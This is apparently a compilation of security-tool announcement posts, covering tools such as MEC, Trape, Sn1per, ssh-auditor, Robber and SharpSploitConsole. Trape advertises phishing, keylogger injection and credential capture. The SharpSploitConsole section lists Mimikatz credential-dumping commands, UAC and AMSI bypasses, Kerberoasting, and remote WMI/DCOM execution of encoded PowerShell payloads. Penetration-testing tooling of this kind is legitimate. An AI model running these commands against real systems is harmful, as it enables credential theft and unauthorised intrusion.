MEC v1.4.0 – Mass Exploit Console

massExploitConsolea collection of hacking tools with a cli ui.Disclaimerplease use this tool only on authorized systems, im not responsible for any damage caused by users who ignore my warningexploits are adapted from other sources, please refer to their author infoplease note, due to my limited programming experience (it’s my first Python project), you can expect some silly bugsFeaturesan easy-to-use cli uiexecute any adpated exploits with process-level concurrencysome built-in exploits (automated)hide your ip addr using proxychains4 and ss-proxy (built-in)zoomeye host scan (10 threads)a simple baidu crawler (multi-threaded)censys host scanGetting startedgit clone https://github.com/jm33-m0/massExpConsole.git && cd massExpConsole && ./install.pywhen installing pypi deps, apt-get install libncurses5-dev (for Debian-based distros) might be needednow you should be good to go (if not, please report missing deps here)type proxy command to run a pre-configured Shadowsocks socks5 proxy in the background, vim ./data/ss.json to edit proxy config. and, ss-proxy exits with mec.pyRequirementsGNU/Linux, WSL, MacOS (not tested), fully tested under Arch Linux, Kali Linux (Rolling, 2018), Ubuntu Linux (16.04 LTS) and Fedora 25 (it will work on other distros too as long as you have dealt with all deps)Python 3.5 or later (or something might go wrong, https://github.com/jm33-m0/massExpConsole/issues/7#issuecomment-305962655)proxychains4 (in $PATH), used by exploiter, requires a working socks5 proxy (you can modify its config in mec.py)Java is required when using Java deserialization exploits, you might want to install openjdk-8-jre if you haven’t installed it yetnote that you have to install all the deps of your exploits or tools as wellUsagejust run mec.py, if it complains about missing modules, install themif you want to add your own exploit script (or binary file, whatever):cd exploits, mkdir your exploit should take the last argument passed to it as its target, dig into mec.py to know morechmod +x <exploit> to make sure it can be executed by current useruse attack command then m to select your custom exploittype help in the console to see all available featureszoomeye requires a valid user account config file zoomeye.conf Download MEC

Link: http://www.kitploit.com/2018/12/mec-v140-mass-exploit-console.html

Hayat – Auditing & Hardening Script For Google Cloud Platform

Hayat is a auditing & hardening script for Google Cloud Platform services such as:Identity & Access ManagementNetworkingVirtual MachinesStorageCloud SQL InstancesKubernetes Clustersfor now.Identity & Access ManagementEnsure that corporate login credentials are used instead of Gmail accounts.Ensure that there are only GCP-managed service account keys for each service account.Ensure that ServiceAccount has no Admin privileges.Ensure that IAM users are not assigned Service Account User role at project level.NetworkingEnsure the default network does not exist in a project.Ensure legacy networks does not exists for a project.Ensure that DNSSEC is enabled for Cloud DNS.Ensure that RSASHA1 is not used for key-signing key in Cloud DNS DNSSEC.Ensure that RSASHA1 is not used for zone-signing key in Cloud DNS DNSSEC.Ensure that RDP access is restricted from the Internet.Ensure Private Google Access is enabled for all subnetwork in VPC Network.Ensure VPC Flow logs is enabled for every subnet in VPC Network.Virtual MachinesEnsure that instances are not configured to use the default service account with full access to all Cloud APIs.Ensure “Block Project-wide SSH keys" enabled for VM instances.Ensure oslogin is enabled for a Project.Ensure ‘Enable connecting to serial ports’ is not enabled for VM Instance.Ensure that IP forwarding is not enabled on Instances.StorageEnsure that Cloud Storage bucket is not anonymously or publicly accessible.Ensure that logging is enabled for Cloud storage bucket.Cloud SQL Database ServicesEnsure that Cloud SQL database instance requires all incoming connections to use SSL.Ensure that Cloud SQL database Instances are not open to the world.Ensure that MySql database instance does not allow anyone to connect with administrative privileges.Ensure that MySQL Database Instance does not allows root login from any host.Kubernetes EngineEnsure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters.Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters.Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters.Ensure Master authorized networks is set to Enabled on Kubernetes Engine Clusters.Ensure Kubernetes Clusters are configured with Labels.Ensure Kubernetes web UI / Dashboard is disabled.Ensure Automatic node repair is enabled for Kubernetes Clusters.Ensure Automatic node upgrades is enabled on Kubernetes Engine Clusters nodes.RequirementsHayat has been written in bash script using gcloud and it’s compatible with Linux and OSX.Usagegit clone https://github.com/DenizParlak/Hayat.git && cd Hayat && chmod +x hayat.sh && ./hayat.shYou can use with specific functions, e.g if you want to scan just Kubernetes Cluster:./hayat.sh –only-kubernetesScreenshotsDownload Hayat

Link: http://feedproxy.google.com/~r/PentestTools/~3/eanL2lSrxVg/hayat-auditing-hardening-script-for.html

MCExtractor – Intel, AMD, VIA &Amp; Freescale Microcode Extraction Tool

Intel, AMD, VIA & Freescale Microcode Extraction ToolMC Extractor News FeedMC Extractor Discussion TopicIntel, AMD & VIA CPU Microcode RepositoriesA. About MC ExtractorMC Extractor is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc. It is capable of converting Intel microcode containers (dat, inc, h, txt) to binary images for BIOS integration, detecting new/unknown microcodes, checking microcode health, Updated/Outdated status and more. MC Extractor can be also used as a research analysis tool with multiple structures which allow, among others, full parsing & information display of all documented or not microcode Headers. Moreover, with the help of its extensive database, MC Extractor is capable of uniquely categorizing all supported microcodes as well as check for any microcodes which have not been stored at the Microcode Repositories yet.A1. MC Extractor FeaturesSupports all current & legacy Microcodes from 1995 and onwardScans for all Intel, AMD, VIA & Freescale microcodes in one runVerifies all extracted microcode integrity via ChecksumsChecks if all Intel, AMD & VIA microcodes are Latest or OutdatedConverts Intel containers (dat,inc,txt,h) to binary imagesSearches on demand for all microcodes based on CPUIDShows microcode Header structures and details on demandIgnores most false positives based on sanity checksSupports known special, fixed or modded microcodesAbility to quickly add new microcode entries to the databaseAbility to detect Intel Production/Pre-Production Release tagAbility to analyze multiple files by drag & drop or by input pathAbility to ignore extracted duplicates based on name and contentsReports all microcodes which are not found at the Microcode RepositoriesFeatures command line parameters to enhance functionality & assist researchFeatures user friendly messages & proper handling of unexpected code errorsShows results in nice tables with colored text to signify emphasisOpen Source project licensed under GNU GPL v3, comment assisted codeA2. Microcode Repository DatabaseMC Extractor allows end-users and/or researchers to quickly extract, view, convert & report new microcode versions without the use of special tools or Hex Editors. To do that effectively, a database had to be built. The Intel, AMD & VIA CPU Microcode Repositories is a collection of every Intel, AMD & VIA CPU Microcodes we have found. Its existence is very important for MC Extractor as it allows us to continue doing research, find new types of microcode, compare releases for similarities, check for updated binaries etc. Bundled with MC Extractor is a file called MCE.db which is required for the program to run. It includes entries for all Microcode binaries that are available to us. This accommodates primarily two actions: a) Check whether the imported microcode is up to date and b) Help find new Microcode releases sooner by reporting them at the Intel, AMD & VIA CPU Microcode Repositories Discussion thread.A3. Sources and InspirationMC Extractor was initially based on a fraction of Lordkag’s UEFIStrip tool so, first and foremost, I thank him for all his work which inspired this project. Among others, great places to learn about microcodes are Intel’s own download site and official documentation, Intel Microcode Patch Authentication, Coreboot (a,b,c), Microparse by Dominic Chen, Ben Hawkes’s Notes and Research, Richard A Burton’s Microdecode, AIDA64 CPUID dumps, Sandpile CPUID, Free Electrons (a, b), Freescale and many more which I may have forgotten but would have been here otherwise.B. How to use MC ExtractorThere are two ways to use MC Extractor, MCE executable & Command Prompt. The MCE executable allows you to drag & drop one or more firmware and view them one by one or recursively scan entire directories. To manually call MC Extractor, a Command Prompt can be used with -skip as parameter.B1. MC Extractor ExecutableTo use MC Extractor, select one or multiple files and Drag & Drop them to its executable. You can also input certain optional parameters either by running MCE directly or by first dropping one or more files to it. Keep in mind that, due to operating system limitations, there is a limit on how many files can be dropped at once. If the latter is a problem, you can always use the -mass parameter to recursively scan entire directories as explained below.B2. MC Extractor ParametersThere are various parameters which enhance or modify the default behavior of MC Extractor:-? : Displays help & usage screen-skip : Skips welcome & options screen-exit : Skips Press enter to exit prompt-redir : Enables console redirection support-mass : Scans all files of a given directory-info : Displays microcode header(s)-add : Adds new input microcode to DB-dbname : Renames input file based on DB name-cont : Extracts Intel containers (dat,inc,h,txt)-search : Searches for microcodes based on CPUID-last : Shows Latest status based on user input-repo : Builds microcode repositories from inputB3. MC Extractor Error ControlDuring operation, MC Extractor may encounter issues that can trigger Notes, Warnings and/or Errors. Notes (yellow/green color) provide useful information about a characteristic of this particular firmware. Warnings (purple color) notify the user of possible problems that can cause system instability. Errors (red color) are shown when something unexpected or problematic is encountered.C. Download MC ExtractorMC Extractor consists of two files, the executable (MCE.exe or MCE) and the database (MCE.db). An already built/frozen/compiled binary is provided by me for Windows only (icon designed by Alfredo Hernandez). Thus, you don’t need to manually build/freeze/compile MC Extractor under Windows. Instead, download the latest version from the Releases tab, title should be “MC Extractor v1.X.X". You may need to scroll down a bit if there are DB releases at the top. The latter can be used to update the outdated DB which was bundled with the latest executable release, title should be "DB rXX". To extract the already built/frozen/compiled archive, you need to use programs which support RAR5 compression.C1. CompatibilityMC Extractor should work at all Windows, Linux or macOS operating systems which have Python 3.6 support. Windows users who plan to use the already built/frozen/compiled binaries must make sure that they have the latest Windows Updates installed which include all required "Universal C Runtime (CRT)" libraries.C2. Code PrerequisitesTo run MC Extractor’s python script, you need to have the following 3rd party Python modules installed:Coloramapip3 install coloramaPTablepip3 install https://github.com/platomav/PTable/archive/boxchar.zipC3. Build/Freeze/Compile with PyInstallerPyInstaller can build/freeze/compile MC Extractor at all three supported platforms, it is simple to run and gets updated often.Make sure Python 3.6.0 or newer is installed:python –versionUse pip to install PyInstaller:pip3 install pyinstallerUse pip to install colorama:pip3 install coloramaUse pip to install PTable:pip3 install https://github.com/platomav/PTable/archive/boxchar.zipBuild/Freeze/Compile MC Extractor:pyinstaller –noupx –onefile MCE.pyAt dist folder you should find the final MCE executableD. PicturesNote: Some pictures are outdated and depict older MC Extractor versions.Download MCExtractor

Link: http://feedproxy.google.com/~r/PentestTools/~3/UdW1gu5O6Ds/mcextractor-intel-amd-via-freescale.html

Trape v2.0 – People Tracker On The Internet: OSINT Analysis And Research Tool

Trape is a OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control over their users through the browser, without them knowing, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.At the beginning of the year 2018 was presented at BlackHat Arsenal in Singapore: https://www.blackhat.com/asia-18/arsenal.html#jose-pino and in multiple security events worldwide.Some benefitsLOCATOR OPTIMIZATION: Trace the path between you and the target you’re tracking. Each time you make a move, the path will be updated, by means of this the location of the target is obtained silently through a bypass made in the browsers, allowing you not to skip the location request permit on the victim’s side , objective or person and at the same time maintain a precision of 99% in the locator.APPROACH: When you’re close to the target, Trape will tell you.REST API: Generates an API (random or custom), and through this you can control and monitor other Web sites on the Internet remotely, getting the traffic of all visitors. PROCESS HOOKS: Manages social engineering attacks or processes in the target’s browser.— SEVERAL: You can issue a phishing attack of any domain or service in real time as well as send malicious files to compromise the device of a target.— INJECT JS: You keep the JavaScript code running free in real time, so you can manage the execution of a keylogger or your own custom functions in JS which will be reflected in the target’s browser.— SPEECH: A process of audio creation is maintained which is played in the browser of the objective, by means of this you can execute personalized messages in different voices with languages in Spanish and English. PUBLIC NETWORK TUNNEL: Trape has its own API that is linked to ngrok.com to allow the automatic management of public network tunnels; By this you can publish your content of trape server executed locally to the Internet, to manage hooks or public attacks.CLICK ATTACK TO GET CREDENTIALS: Automatically obtains the target credentials, recognizing your connection availability on a social network or Internet service. NETWORK: You can get information about the user’s network.— SPEED: Viewing the target’s network speed. (Ping, download, upload, type connection)— HOSTS OR DEVICES: Here you can get a scan of all the devices that are connected in the target network automatically. PROFILE: Brief summary of the target’s behavior and important additional information about your device.— GPU — ENERGY 30-session recognitionSession recognition is one of trape most interesting attractions, since you as a researcher can know remotely what service the target is connected to.USABILITY: You can delete logs and view alerts for each process or action you run against each target.How to use itFirst unload the tool.git clone https://github.com/jofpin/trape.gitcd trapepython trape.py -hIf it does not work, try to install all the libraries that are located in the file requirements.txtpip install -r requirements.txtExample of executionExample: python trape.py –url http://example.com –port 8080HELP AND OPTIONSuser:~$ python trape.py –helpusage: python trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT] [-ak ACCESSKEY] [-l LOCAL] [–update] [-n] [-ic INJC]optional arguments: -h, –help show this help message and exit -v, –version show program’s version number and exit -u URL, –url URL Put the web page url to clone -p PORT, –port PORT Insert your port -ak ACCESSKEY, –accesskey ACCESSKEY Insert your custom key access -l LOCAL, –local LOCAL Insert your home file -n, –ngrok Insert your ngrok Authtoken -ic INJC, –injectcode INJC Insert your custom REST API path -ud UPDATE, –update UPDATE Update trape to the latest version–url In this option you add the URL you use to clone Live, which works as a decoy.–port Here you insert the port, where you are going to run the trape server.–accesskey You enter a custom key for the trape panel, if you do not insert it will generate an automatic key.–injectcode trape contains a REST API to play anywhere, using this option you can customize the name of the file to include, if it does not, generates a random name allusive to a token.–local Using this option you can call a local HTML file, this is the replacement of the –url option made to run a local lure in trape.–ngrok In this option you can enter a token, to run at the time of a process. This would replace the token saved in configurations.–version You can see the version number of trape.–update Option especially to upgrade to the latest version of trape.–help It is used to see all the above options, from the executable.DisclaimerThis tool has been published educational purposes in order to teach people how bad guys could track them or monitor them or obtain information from their credentials, we are not responsible for the use or the scope that may have the People through this project.We are totally convinced that if we teach how vulnerable things are, we can make the Internet a safer place.DeveloperThis development and others, the participants will be mentioned with name, Twitter and charge. CREATOR— Jose Pino – @jofpin – (Security Researcher)Download Trape v2.0

Link: http://www.kitploit.com/2018/11/trape-v20-people-tracker-on-internet.html

Sn1per v6.0 – Automated Pentest Framework For Offensive Security Experts

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security’s premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.SN1PER PROFESSIONAL FEATURES:Professional reporting interfaceSlideshow for all gathered screenshotsSearchable and sortable DNS, IP and open port databaseCategorized host reportsQuick links to online recon tools and Google hacking queriesPersonalized notes field for each hostDEMO VIDEO:SN1PER COMMUNITY FEATURES: Automatically collects basic recon (ie. whois, ping, DNS, etc.) Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers Automatically checks for sub-domain hijacking Automatically runs targeted NMap scripts against open ports Automatically runs targeted Metasploit scan and exploit modules Automatically scans all web applications for common vulnerabilities Automatically brute forces ALL open services Automatically test for anonymous FTP access Automatically runs WPScan, Arachni and Nikto for all web services Automatically enumerates NFS shares Automatically test for anonymous LDAP access Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities Automatically enumerate SNMP community strings, services and users Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers Automatically tests for open X11 servers Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds Performs high level enumeration of multiple hosts and subnets Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting Automatically gathers screenshots of all web sites Create individual workspaces to store all scan outputAUTO-PWN:Drupal Drupalgedon2 RCE CVE-2018-7600GPON Router RCE CVE-2018-10561Apache Struts 2 RCE CVE-2017-5638Apache Struts 2 RCE CVE-2017-9805Apache Jakarta RCE CVE-2017-5638Shellshock GNU Bash RCE CVE-2014-6271HeartBleed OpenSSL Detection CVE-2014-0160Default Apache Tomcat Creds CVE-2009-3843MS Windows SMB RCE MS08-067Webmin File Disclosure CVE-2006-3392Anonymous FTP AccessPHPMyAdmin Backdoor RCEPHPMyAdmin Auth BypassJBoss Java De-Serialization RCE’sKALI LINUX INSTALL:./install.shDOCKER INSTALL:Credits: @menzowDocker Install: https://github.com/menzow/sn1per-dockerDocker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/Example usage:$ docker pull menzo/sn1per-docker$ docker run –rm -ti menzo/sn1per-docker sniper menzo.ioUSAGE:[*] NORMAL MODEsniper -t|–target [*] NORMAL MODE + OSINT + RECONsniper -t|–target <TARGET> -o|–osint -re|–recon[*] STEALTH MODE + OSINT + RECONsniper -t|–target <TARGET> -m|–mode stealth -o|–osint -re|–recon[*] DISCOVER MODEsniper -t|–target <CIDR> -m|–mode discover -w|–workspace <WORSPACE_ALIAS>[*] SCAN ONLY SPECIFIC PORTsniper -t|–target <TARGET> -m port -p|–port <portnum>[*] FULLPORTONLY SCAN MODEsniper -t|–target <TARGET> -fp|–fullportonly[*] PORT SCAN MODEsniper -t|–target <TARGET> -m|–mode port -p|–port <PORT_NUM>[*] WEB MODE – PORT 80 + 443 ONLY!sniper -t|–target <TARGET> -m|–mode web[*] HTTP WEB PORT MODEsniper -t|–target <TARGET> -m|–mode webporthttp -p|–port <port>[*] HTTPS WEB PORT MODEsniper -t|–target <TARGET> -m|–mode webporthttps -p|–port <port>[*] ENABLE BRUTEFORCEsniper -t|–target <TARGET> -b|–bruteforce[*] AIRSTRIKE MODEsniper -f|–file /full/path/to/targets.txt -m|–mode airstrike[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLEDsniper -f–file /full/path/to/targets.txt -m|–mode nuke -w|–workspace <WORKSPACE_ALIAS>[*] ENABLE LOOT IMPORTING INTO METASPLOITsniper -t|–target <TARGET>[*] LOOT REIMPORT FUNCTIONsniper -w <WORKSPACE_ALIAS> –reimport[*] UPDATE SNIPERsniper -u|–updateMODES:NORMAL: Performs basic scan of targets and open ports using both active and passive checks for optimal performance.STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.FULLPORTONLY: Performs a full detailed port scan and saves results to XML.WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.UPDATE: Checks for updates and upgrades all components used by sniper.REIMPORT: Reimport all workspace files into Metasploit and reproduce all reports.RELOAD: Reload the master workspace report.SAMPLE REPORT:https://gist.github.com/1N3/8214ec2da2c91691bcbcDownload Sn1per v5.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/RLWB_3_Wk9M/sn1per-v60-automated-pentest-framework.html

CMS Scanner – Scan WordPress, Drupal, Joomla, vBulletin Websites For Security Issues

Scan WordPress, Drupal, Joomla, vBulletin websites for Security issues.CMSScan provides a centralized Security Dashboard for CMS Security scans. It is powered by wpscan, droopescan, vbscan and joomscan. It supports both on demand and scheduled scans and has the ability to sent email reports.Install# Requires ruby, ruby-dev, gem, python3 and gitgit clone https://github.com/ajinabraham/CMSScan.gitcd CMSScan./setup.shRun./run.shPeriodic ScansYou can perform periodic CMS scans with CMSScan. You must run CMSScan server separately and configure the following before running the scheduler.py script.# SMTP SETTINGSSMTP_SERVER = ”FROM_EMAIL = ”TO_EMAIL = ”# SERVER SETTINGSSERVER = ”# SCAN SITESWORDPRESS_SITES = []DRUPAL_SITES = []JOOMLA_SITES = []VBULLETIN_SITES = []Add a cronjobcrontab -e@weekly /usr/bin/python3 scheduler.pyDockerLocaldocker build -t cmsscan .docker run -it -p 7070:7070 cmsscanPrebuilt Imagedocker pull opensecurity/cmsscandocker run -it -p 7070:7070 opensecurity/cmsscanScreenshotsDownload CMSScan

Link: http://feedproxy.google.com/~r/PentestTools/~3/w0AREgkhNJQ/cms-scanner-scan-wordpress-drupal.html

SSH Auditor – The Best Way To Scan For Weak Ssh Passwords On Your Network

The Best Way To Scan For Weak Ssh Passwords On Your NetworkFeaturesssh-auditor will automatically:Re-check all known hosts as new credentials are added. It will only check the new credentials.Queue a full credential scan on any new host discovered.Queue a full credential scan on any known host whose ssh version or key fingerprint changes.Attempt command execution as well as attempt to tunnel a TCP connection.Re-check each credential using a per credential scan_interval – default 14 days.It’s designed so that you can run ssh-auditor discover + ssh-auditor scan from cron every hour to to perform a constant audit.DemosEarlier demo showing all of the featuresDemo showing improved log outputUsageInstall$ brew install go # or however you want to install the go compiler$ go get github.com/ncsa/ssh-auditoror Build from a git clone$ go buildBuild a static binary including sqlite$ make staticEnsure you can use enough file descriptors$ ulimit -n 4096Create initial database and discover ssh servers$ ./ssh-auditor discover -p 22 -p 2222 192.168.1.0/24 10.0.0.1/24Add credential pairs to check$ ./ssh-auditor addcredential root root$ ./ssh-auditor addcredential admin admin$ ./ssh-auditor addcredential guest guest –scan-interval 1 #check this once per dayTry credentials against discovered hosts in a batch of 20000$ ./ssh-auditor scanOutput a report on what credentials worked$ ./ssh-auditor vulnRE-Check credentials that worked$ ./ssh-auditor rescanOutput a report on duplicate key usage$ ./ssh-auditor dupesReport query.This query that ssh-auditor vuln runs isselect hc.hostport, hc.user, hc.password, hc.result, hc.last_tested, h.version from host_creds hc, hosts h where h.hostport = hc.hostport and result!=” order by last_tested ascDownload Ssh-Auditor

Link: http://feedproxy.google.com/~r/PentestTools/~3/EzIGBgulgtk/ssh-auditor-best-way-to-scan-for-weak.html

Robber – Robber Is Open Source Tool For Finding Executables Prone To DLL Hijacking

Robber is a free open source tool developed using Delphi XE2 without any 3rd party dependencies.What is DLL hijacking ?!Windows has a search path for DLLs in its underlying architecture. If you can figure out what DLLs an executable requests without an absolute path (triggering this search process), you can then place your hostile DLL somewhere higher up the search path so it’ll be found before the real version is, and Windows will happilly feed your attack code to the application.So, let’s pretend Windows’s DLL search path looks something like this:A) . <-- current working directory of the executable, highest priority, first checkB) \WindowsC) \Windows\system32D) \Windows\syswow64 <-- lowest priority, last checkand some executable "Foo.exe" requests "bar.dll", which happens to live in the syswow64 (D) subdir. This gives you the opportunity to place your malicious version in A), B) or C) and it will be loaded into executable.As stated before, even an absolute full path can't protect against this, if you can replace the DLL with your own version.Microsoft Windows protect system pathes like System32 using Windows File Protection mechanism but the best way to protect executable from DLL hijacking in entrprise solutions is :Use absolute path instead of relative pathIf you have personal sign, sign your DLL files and check the sign in your application before load DLL into memory. otherwise check the hash of DLL file with original DLL hash)And of course, this isn't really limited to Windows either. Any OS which allows for dynamic linking of external libraries is theoretically vulnerable to this.Robber use simple mechanism to figure out DLLs that prone to hijacking :Scan import table of executable and find out DLLs that linked to executableSearch for DLL files placed inside executable that match with linked DLL (as i said before current working directory of the executable has highest priority)If any DLL found, scan the export table of themeCompare import table of executable with export table of DLL and if any matching was found, the executable and matched common functions flag as DLL hijack candidate.Feauters :Ability to select scan type (signed/unsigned applications)Determine executable signerDetermine wich referenced DLLs candidate for hijackingDetermine exported method names of candidate DLLsConfigure rules to determine which hijacks is best or good choice for use and show theme in different colorsFind out latest Robber executable hereDownload Robber

Link: http://feedproxy.google.com/~r/PentestTools/~3/-3o2PCxEGpE/robber-robber-is-open-source-tool-for.html

FindYara – IDA Python Plugin To Scan Binary With Yara Rules

Use this IDA python plugin to scan your binary with yara rules. All the yara rule matches will be listed with their offset so you can quickly hop to them!All credit for this plugin and the code goes to David Berard (@p0ly)This plugin is copied from David’s excellent findcrypt-yara plugin. This plugin just extends his to use any yara rule.InstallationInstall yara-pythonUsing pip: pip install yara-pythonOther methods: https://pypi.python.org/pypi/yara-pythonCopy FindYara.py to your IDA “plugins" directoryWatch the tutorial video!Yara Rules With IDA Pro">UsageLaunch the pluginThe plugin can be launched from the menu using Edit->Plugins->FindYara. Or the plugin can be quickly launched using the hot-key combination ctl-alt-y. Select a Yara file to scan withWhen the plugin launches it will open a file selection dialogue box. You will need to use this to choose the yara file that you want to scan with. View matchesAll of the strings from the yara rule that match the binary will be displayed along with the match locations. AcknowledgmentsA huge thank you to David Berard (@p0ly) – Follow him on GitHub here! This is mostly his code and he gets all the credit for the original plugin framework.Also, hat tip to Alex Hanel @nullandnull – Follow him on GitHub here. Alex helped me sort through how the IDC methods are being used. His IDA Python book is a fantastic reference!!Feedback / HelpAny questions, comments, requests hit me up on twitter: @herrcorePull requests welcome!Download FindYara

Link: http://feedproxy.google.com/~r/PentestTools/~3/SUaACTisvsI/findyara-ida-python-plugin-to-scan.html

SharpSploitConsole – Console Application Designed To Interact With SharpSploit

Console Application designed to interact with SharpSploit released by @cobbr_ioSharpSploit is a tool written by @cobbr_io that combines many techniques/C# code from the infosec community and combines it into one sweet DLL. It’s awesome so check it out!DescriptionSharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit. By following the instructions below you should be able to embed both the SharpSploit.dll and System.Management.Automation.dll into the SharpSploitConsole binary, creating a standalone exe you can drop on an appropriate target sytem and run over a non-interactive shell (such as beacon).This concept can be applied to many C# binaries. For example, we could embed the System.Management.Automation.dll into our favorite C# NoPowershell.exe, creating a binary that doesn’t rely on the System.Management.Automation.dll on the target system.Contact at:Twitter: @anthemtotheego or @g0ldengunsecSetup – Quick and DirtyNote: For those of you who don’t want to go through the trouble of compiling your own I uploaded an x64 and x86 binary found in the CompiledBinaries folder. For those of you who do want to compile your own… I used Windows 10, Visual Studio 2017 – mileage may varyDownload SharpSploit tool from https://github.com/cobbr/SharpSploit.git Open up SharpSploit.sln in Visual Studio and compile (make sure to compile for correct architecture) – Should see drop down with Any CPU > Click on it and open Configuration Manager > under platform change to desired architecture and select ok. Download SharpSploitConsole tool and open up SharpSploitConsole.sln Copy both SharpSploit.dll and System.Management.Automation.dll found in SharpSploit/bin/x64/Debug directory into SharpSploitConsole/bin/x64/Debug folder Next we will set up visual studio to embed our DLL’s into our exe so we can just have a single binary we can run on our target machine. We will do this by doing the following: In visual studio:a. Tools > NuGet Package Manager > Package Manager Consoleb. Inside console run: Install-Package Costura.Fodyc. Open up notepad and paste the following code below and save it with the name FodyWeavers.xml inside the SharpSploitConsole directory that holds your bin, obj, properties folders. <Weavers> <Costura /> </Weavers>Inside visual studio, right click References on the righthand side, choose Add Reference, then browse to the SharpSploitConsole/bin/x64/Debug directory where we put our two DLL’s, select them and add them. Compile, drop binary on target computer and have fun. ExamplesNote: All commands are case insensitiveBy default all commands can be taken in as command line args, they will be executed and the program will exit (great for remote shells). This looks something like the following: sharpSploitConsole.exe getSystem logonPasswords. Alternatively, if you want to use the interactive console mode, you can use the interact command to get a pseudo-interactive shell.Start interactive console mode:InteractMimikatz all the things (does not run DCSync) – requires admin or system:Mimi-AllRuns a specific Mimikatz command of your choice – requires admin or system:Mimi-Command privilege::debug sekurlsa::logonPasswordsRuns the Mimikatz command privilege::debug sekurlsa::logonPasswords – requires admin or system:logonPasswordsRuns the Mimikatz command to retrieve Domain Cached Credentials hashes from registry – requires admin or system:LsaCacheRuns the Mimikatz command to retrieve LSA Secrets stored in registry – requires admin or system:LsaSecretsRetrieve password hashes from the SAM database – requires admin or system:SamDumpRetrieve Wdigest credentials from registry – requires admin or system:WdigestRetrieve current user:whoamiUsernameImpersonate system user – requires admin rights:GetSystemImpersonate system user – Impersonate the token of a specified process, requires pid – command requires admin rights:Impersonate 2918Bypass UAC – requires binary | command | path to binary – requires admin rights:BypassUAC cmd.exe ipconfig C:\Windows\System32\BypassUAC cmd.exe "" C:\Windows\System32\Ends the impersonation of any token, reverts back to initial token associated with current process:RevertToSelfRetrieve current working directory:CurrentDirectoryRetrieve current directory listing:DirectoryListingChanges the current directory by appending a specified string to the current working directory:ChangeDirectory SomeFolderRetrieve hostname:HostnameRetrieve list of running processes:ProcessListCreates a minidump of the memory of a running process, requires PID | output location | output name – requires admin:ProcDump 2198 C:\Users\Username\Desktop memorydump.dmpRetrieve registry path value, requires full path argument:ReadRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\BuildNumberWrite to registry, requires full path argument and value argument:WriteRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\RemoteAccessEnabled 1Retrieve users of local group remotely, requires computername | groupname | username | password:NetLocalGroupMembers computerName Administrators domain\username P@55w0rd!NetLocalGroupMembers 192.168.1.20 Administrators .\username P@55w0rd!Retrieve local groups remotely, requires computername | username | password:NetLocalGroups computerName domain\username P@55w0rd!NetLocalGroups 192.168.1.20 .\username P@55w0rd!Retrieve current logged on users remotely, requires computername | username | password:NetLoggedOnUsers computerName domain\username P@55w0rd!NetLoggedOnUsers 192.168.1.20 .\username P@55w0rd!Retrieve user sessions remotely, requires computername | username | password:NetSessions computerName domain\username P@55w0rd!NetSessions 192.168.1.20 .\username P@55w0rd!Ping systems, requires computernames:Ping computer1 computer2 computer3 computer4Port scan systems, requires computername | ports:PortScan computer1 80 443 445 22 23Get Domain Users, Grabs specified (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:GetDomainUsersGet Domain Groups, Grabs specified (or all) group objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:GetDomainGroupsGetDomainGroups -target "Domain Admins"Get Domain Computers, Grabs specified (or all) computer objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:GetDomainComputersPerform Kerberoasting, Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -targetKerberoastKerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlServiceRun command remotely via WMI, requires computername | username | password | command – requires admin:WMI computer1 domain\username P@55w0rd! <entire powershell empire payload>WMI computer1 .\username P@55w0rd! powershell -noP -sta -w 1 -enc <Base64>Run command remotely via DCOM, requires computername | command | directory | params – requires admin:DCOM computer1 cmd.exe c:\Windows\System32 powershell -noP -sta -w 1 -enc <Base64>Run shell command:Shell ipconfig /allRun powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging:Powershell 